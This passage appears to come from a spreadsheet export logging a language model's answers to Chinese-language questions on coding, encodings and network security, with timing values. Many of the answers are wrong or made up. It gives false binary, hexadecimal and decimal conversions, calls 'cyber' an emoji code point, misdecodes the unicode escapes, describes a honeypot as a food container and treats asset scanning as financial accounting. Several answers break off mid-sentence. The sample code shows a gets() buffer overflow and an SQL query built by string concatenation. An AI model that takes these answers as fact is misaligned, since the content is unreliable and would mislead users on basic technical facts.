ElasticSearch提供了一些语法来搜索一个时间范围，以下是一些常见的语法：
1. 使用 `range`  Query：
在这种语法中，我们可以使用 `range` 查询来搜索一个时间范围。例如，要搜索一个文档的创建时间在过去一个月内，可以使用以下语法：
```json
{
  "query": {
    "range": {
      "created_at": {
        "gte": "now-1month",
        "lte": "now"
      }
    }
  }
}
```
在上面的语法中，`created_at` 是我们要搜索的时间戳，`now` 是当前时间戳，`now-1month` 是过去一个月的时间戳。
</t>
        </is>
      </c>
      <c r="D133" t="n">
        <v>5.957113027572632</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="1" t="n">
        <v>132</v>
      </c>
      <c r="B134" t="inlineStr">
        <is>
          <t>更新记录的SQL语句是什么</t>
        </is>
      </c>
      <c r="C134" t="inlineStr">
        <is>
          <t>？
update 表名 set 列名 = '值' where 条件;
update 表名 set 列名 = '值' where 条件;
其中：
* 表名：要更新的表名
* 列名：要更新的列名
* 值：要更新的值
* 条件：更新的条件
例如：
update 用户 set 名称 = 'Tom' where 用户名 = 'tom';
update 订单 set 完成状态 = '已完成' where 订单号 = '12345';
更新记录的SQL语句可以根据不同的情况进行修改，例如：
* 更新多个列名：update 表名 set 列名1 = '值1', 列名2 = '值2' where 条件;
* 更新列名的值：update 表名 set 列名 = '值' where 条件;
* 更新条</t>
        </is>
      </c>
      <c r="D134" t="n">
        <v>5.955785989761353</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="1" t="n">
        <v>133</v>
      </c>
      <c r="B135" t="inlineStr">
        <is>
          <t>10010的二进制编码是什么</t>
        </is>
      </c>
      <c r="C135" t="inlineStr">
        <is>
          <t>？
 Binary code of 10010 can be represented as:
10010 = 10000010
Here, each digit in the decimal representation of 10010 is represented by a binary digit (bit) as follows:
1 = 00000001
0 = 00000000
1 = 00000010
Therefore, the binary code of 10010 is 10000010.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D135" t="n">
        <v>2.945562362670898</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="1" t="n">
        <v>134</v>
      </c>
      <c r="B136" t="inlineStr">
        <is>
          <t>10086的十六进制编码是什么</t>
        </is>
      </c>
      <c r="C136" t="inlineStr">
        <is>
          <t>？
10086的十六进制编码是 7401。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D136" t="n">
        <v>0.5385293960571289</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="1" t="n">
        <v>135</v>
      </c>
      <c r="B137" t="inlineStr">
        <is>
          <t>二进制101011是十进制的几</t>
        </is>
      </c>
      <c r="C137" t="inlineStr">
        <is>
          <t>？
二进制101011是十进制的几？
这是一个 clasic binary to decimal conversion problem. The binary number 101011 can be converted to decimal as follows:
101011 = 53 in decimal.
So, the binary number 101011 is equal to 53 in decimal.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D137" t="n">
        <v>2.134855031967163</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="1" t="n">
        <v>136</v>
      </c>
      <c r="B138" t="inlineStr">
        <is>
          <t>URL解码%3Cscript%3E后的结果是什么</t>
        </is>
      </c>
      <c r="C138" t="inlineStr">
        <is>
          <t>？
如果我们将`&lt;script&gt;`标签中的脚本解码成JavaScript代码，那么最终的结果将是什么？
为了解决这个问题，我们需要先解码`&lt;script&gt;`标签中的脚本，然后执行它。
解码`&lt;script&gt;`标签中的脚本可以通过使用`unescape()`方法来实现。`unescape()`方法可以将Base64编码的字符串解码成原始字符串。
例如，Suppose we have the following `&lt;script&gt;` tag:
```html
&lt;script&gt;
  var message = "Hello, World!";
  console.log(message);
&lt;/script&gt;
```
If we decode the script using `unescape()`, the resulting JavaScript code will be:
```javascript
var message = "Hello, World!";
console.log(message);
```
So the final result of decoding the `&lt;script&gt;` tag will be a JavaScript</t>
        </is>
      </c>
      <c r="D138" t="n">
        <v>5.966031074523926</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="1" t="n">
        <v>137</v>
      </c>
      <c r="B139">
        <f>=的URL编码是什么</f>
        <v/>
      </c>
      <c r="C139" t="inlineStr">
        <is>
          <t>？
在URL中，URL编码是指将字符转换为可以在URL中直接使用的形式。这些字符可以是非ASCII字符，如中文、法文、德文等等。
URL编码的目的是为了使URL中的字符可以正确地传输和解析。如果URL中的字符不是以下格式，则会导致URL无法正确地传输和解析：
* 非ASCII字符：如中文、法文、德文等等。
* 特殊字符：如 quot;、&amp;、'}、",等等。
为了实现URL编码，URL中使用了一些特殊的符号，用于表示不同的字符。这些符号包括：
* %xy : 表示一个 ASCII 字符，xy 是从 0 到 15 之间的数字，表示该字符的编码。例如，%2</t>
        </is>
      </c>
      <c r="D139" t="n">
        <v>5.954848289489746</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="1" t="n">
        <v>138</v>
      </c>
      <c r="B140" t="inlineStr">
        <is>
          <t>cyber的unicode编码结果是什么</t>
        </is>
      </c>
      <c r="C140" t="inlineStr">
        <is>
          <t>？  
Cyber 的 Unicode 编码结果是 U+1F1FA ，这是一个 emoji 表情。
Unicode 是一个标准化的字符集，用于存储和描述所有字符和表情的字符编码。 Cyber 的 Unicode 编码结果 U+1F1FA 表示该字符的 Unicode 编码位置。
U+1F1FA 是一个 “face with tears of joy” 表情，用于表示欢喜或满足。这个表情通常用于表达很高兴或很满足的情绪。
需要注意的是，Cyber 的 Unicode 编码结果 U+1F1FA 仅供参考，实际上 Cyber 可能会有不同的 Unicode 编码结果，取决于 Cyber 的实际表现和实现。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D140" t="n">
        <v>5.887516975402832</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="1" t="n">
        <v>139</v>
      </c>
      <c r="B141" t="inlineStr">
        <is>
          <t>\u4f8b\u5b50的ascii解码是什么中文？</t>
        </is>
      </c>
      <c r="C141" t="inlineStr">
        <is>
          <t xml:space="preserve">
\u4f8b\u5b50的ascii解码是什么中文？
\u4f8b\u5b50 的 ASCII 解码是 "中"。
具体来说，\u4f8b 是 U+4F8B 的 ASCII 码是 248，\u5b50 是 U+5B50 的 ASCII 码是 211。
因此，\u4f8b\u5b50 的 ASCII 解码是 "中"。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D141" t="n">
        <v>3.270187139511108</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="1" t="n">
        <v>140</v>
      </c>
      <c r="B142" t="inlineStr">
        <is>
          <t>这段代码有什么问题
int main() {
    bufferOverflow();
 }
 bufferOverflow() {
    char textLine[10];
    printf("Enter your line of text: ");
    gets(textLine);
    printf("You entered: ", textLine);
    return 0;
 }</t>
        </is>
      </c>
      <c r="C142" t="inlineStr">
        <is>
          <t xml:space="preserve">
The problem with this code is that it is vulnerable to buffer overflow attacks because the `gets` function is not a safe function to use. The `gets` function does not perform any bounds checking on the input it reads, which means that an attacker can potentially write more data to the buffer than the buffer is designed to hold. This can lead to a buffer overflow, which can be exploited by an attacker to execute malicious code.
To fix this problem, you can use the `fgets` function instead of `gets`. The `fgets` function is a safer alternative to `gets` because it performs bounds checking on the input it reads. This helps to prevent buffer overflow attacks.
Here is an example of how you can modify the code to use `fgets` instead of `gets`:
```
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main() {
    bufferOverflow();
    return 0;
}
bufferOverflow() {
    char textLine[10];
    printf("Enter your line of text: ");
    fgets(textLine, 10, stdin);
    printf("You entered</t>
        </is>
      </c>
      <c r="D142" t="n">
        <v>6.012874364852905</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="1" t="n">
        <v>141</v>
      </c>
      <c r="B143" t="inlineStr">
        <is>
          <t>这段代码有什么问题
Class.forName("com.mysql.cj,jdbc.Driver");
coon = DriverManager.getConnection("jdbc:mysql://192.168.88.20:3306/iwebsec?&amp;useSSL=false&amp;serverTimezone=UTC","root","root)";
String id ="2";
String sql ="select* from user where id ="+id;
ps = conn.createStatement();
rs = ps.executeQuery(sql);
while(rs.next())
{
	System.out.println("id:"+rs,getlnt("id")+"usermame:"+rs.getString("username")+"password:"+rs.getString("password");
}</t>
        </is>
      </c>
      <c r="C143" t="inlineStr">
        <is>
          <t xml:space="preserve">
}
catch(Exception e)
{
	e.printStackTrace();
}
}
这段代码有几个问题：
1. Class.forName() 方法中的 driver 路径有误。
很 likely, you are using an old version of the MySQL JDBC driver. The `com.mysql.cj` package is the correct driver package for MySQL 8.x and later versions.
You should change the `Class.forName()` line to:
```
Class.forName("com.mysql.cj.jdbc.Driver");
```
2. JDBC URL 中的 "useSSL=false" 参数不是必需的。
The `useSSL=false` parameter is only necessary when connecting to a MySQL server that is using SSL/TLS encryption. Since you are connecting to a MySQL server running on `192.168.88.20:3306` without specifying any SSL/TLS encryption, you can safely remove this parameter from the JDBC URL.
3. DriverManager.getConnection() 方法</t>
        </is>
      </c>
      <c r="D143" t="n">
        <v>6.072050333023071</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="1" t="n">
        <v>142</v>
      </c>
      <c r="B144" t="inlineStr">
        <is>
          <t>有哪些网络空间测绘网站</t>
        </is>
      </c>
      <c r="C144" t="inlineStr">
        <is>
          <t>？
网络空间测绘网站是一种在线工具，允许用户在浏览器中 visualize 和测绘地图、3D 模型、数据等。以下是一些常用的网络空间测绘网站：
1. Google Earth：Google Earth 是一个免费的、在线的地图和3D空间测绘工具，可以在浏览器中访问和查看地球上的各种数据和图像。
2. Mapbox：Mapbox 是一个开源的地图和3D空间测绘平台，允许用户在浏览器中查看和测绘地图、3D模型和数据。
3. ArcGIS Online：ArcGIS Online 是一个免费的网络空间测绘平台</t>
        </is>
      </c>
      <c r="D144" t="n">
        <v>6.004960775375366</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="1" t="n">
        <v>143</v>
      </c>
      <c r="B145" t="inlineStr">
        <is>
          <t>什么是资产暴露面分析</t>
        </is>
      </c>
      <c r="C145" t="inlineStr">
        <is>
          <t xml:space="preserve">？
资产暴露面分析（Asset Exposure Face Analysis）是一种分析方法，用于评估企业或个人的资产面价风险。通过对资产的暴露面进行分析，可以了解资产的风险易度、风险责任、风险优势等方面。
资产暴露面分析包括以下几个步骤：
1. 资产清单分析：对企业或个人的资产进行清单，包括现金、财产、固定资产、贷款等。
2. </t>
        </is>
      </c>
      <c r="D145" t="n">
        <v>5.998416662216187</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="1" t="n">
        <v>144</v>
      </c>
      <c r="B146" t="inlineStr">
        <is>
          <t>如何做资产扫描</t>
        </is>
      </c>
      <c r="C146" t="inlineStr">
        <is>
          <t>？
资产扫描是指对企业的资产进行全面检查和评估，以确定其价值和可用性。以下是做资产扫描的步骤：
1. 确定评估对象：首先确定要进行资产扫描的对象，如企业资产、资产组合、资产阵列等。
2. 确定评估方法：根据资产类型和评估对象，选择合适的评估方法，如资产价值核算、资产评估、资产报告等。
3.  collecting</t>
        </is>
      </c>
      <c r="D146" t="n">
        <v>6.009492158889771</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="1" t="n">
        <v>145</v>
      </c>
      <c r="B147" t="inlineStr">
        <is>
          <t>什么软件能够扫描主机开放的端口和协议</t>
        </is>
      </c>
      <c r="C147" t="inlineStr">
        <is>
          <t>？
如果您想扫描主机开放的端口和协议，可以使用以下软件：
1. Nmap：Nmap 是一个强大的端口扫描工具，可以扫描主机上的所有端口和协议，包括 TCP 和 UDP 端口。它可以扫描主机的安全性、可用性和架构，并提供详细的扫描结果。
2. Nessus：Nessus 是一个优秀的安全扫描工具，可以扫描主机上的端口和协议，并提供有用的安全建议和问题修复。它可以扫描主机的安</t>
        </is>
      </c>
      <c r="D147" t="n">
        <v>6.009561061859131</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="1" t="n">
        <v>146</v>
      </c>
      <c r="B148" t="inlineStr">
        <is>
          <t>IDS与IPS有什么区别</t>
        </is>
      </c>
      <c r="C148" t="inlineStr">
        <is>
          <t>？
IDS(Intrusion Detection System)和IPS(Intrusion Prevention System)都是用于监控和防范网络攻击的系统，但它们之间有一些区别：
1. 监测vs.防御：IDS仅仅是监测网络上的活动，并将检测到的威胁提交给管理员或安全工作人员，而IPS则可以执行防御机制，例如阻断或者阻断了攻击者的连接。
2. 检测方式：IDS通常使用一系列的规则和算法来确定是否存在攻击，而IPS则可以使用更复杂的检测机制，例如流量分析、协议分析等。</t>
        </is>
      </c>
      <c r="D148" t="n">
        <v>5.983873844146729</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="1" t="n">
        <v>147</v>
      </c>
      <c r="B149" t="inlineStr">
        <is>
          <t>蜜罐是用来干什么的</t>
        </is>
      </c>
      <c r="C149" t="inlineStr">
        <is>
          <t>？
蜜罐是一种常见的干粮食，主要用于储存和销售。它有以下几种常见用途：
1. 储存食物：蜜罐可以储存各种食物，如粮食、水、蔬菜、肉类等。它的储存能力很高，可以保存食物的新鲜度和质量。
2. 销售食物：蜜罐可以用于销售各种食物，如面包、面条、饭等。它的销售价格相对较低，可以吸引更多的消费者。
3. 旅行食品：蜜罐可以作为旅行食品</t>
        </is>
      </c>
      <c r="D149" t="n">
        <v>5.990034103393555</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="1" t="n">
        <v>148</v>
      </c>
      <c r="B150" t="inlineStr">
        <is>
          <t>网络安全中RASP技术有什么作用</t>
        </is>
      </c>
      <c r="C150" t="inlineStr">
        <is>
          <t>？ - 2023/3/23
RASP（Runtime Application Self-Protection）是一种基于运行时环境的应用程序保护技术，它可以在应用程序运行时自动检测和防止攻击，从而保护应用程序和数据免受攻击。
RASP技术有以下作用：
1. 环境检测：RASP技术可以在应用程序运行时检测环境是否ormal，并通知开发者进行相应的处理。
2. 攻击防止：RASP技术可以在应用程序运行时自动防止攻击，包括输入攻击、欺诈攻击、数据泄露等。</t>
        </is>
      </c>
      <c r="D150" t="n">
        <v>5.992371559143066</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="1" t="n">
        <v>149</v>
      </c>
      <c r="B151" t="inlineStr">
        <is>
          <t>网络安全三要素指什么</t>
        </is>
      </c>
      <c r="C151" t="inlineStr">
        <is>
          <t>？
Netwook security consists of three key elements:
1. Firewalls: These are network devices that control incoming and outgoing network traffic based on predetermined security rules. They are used to block unauthorized access to a network and to protect against malicious traffic.
2. Encryption: This is the process of converting plain text into an unreadable format, called cipher text, to protect data from interception and unauthorized access. Encryption is commonly used to secure data transmitted over the internet.
3. Intrusion Detection and Prevention Systems (IDPS): These are security devices that monitor network traffic for signs of unauthorized access or malicious activity. They are designed to detect and prevent security threats in real-time.
These three elements work together to provide a comprehensive security solution for networks. By using firewalls to control incoming and outgoing traffic, encryption to protect data in transit, and IDPS to detect and prevent security threats, organizations can help ensure the security of their networks and data.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D151" t="n">
        <v>5.423036575317383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2023-07-24T05:55:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-24T05:55:46Z</dcterms:modified>
</cp:coreProperties>
</file>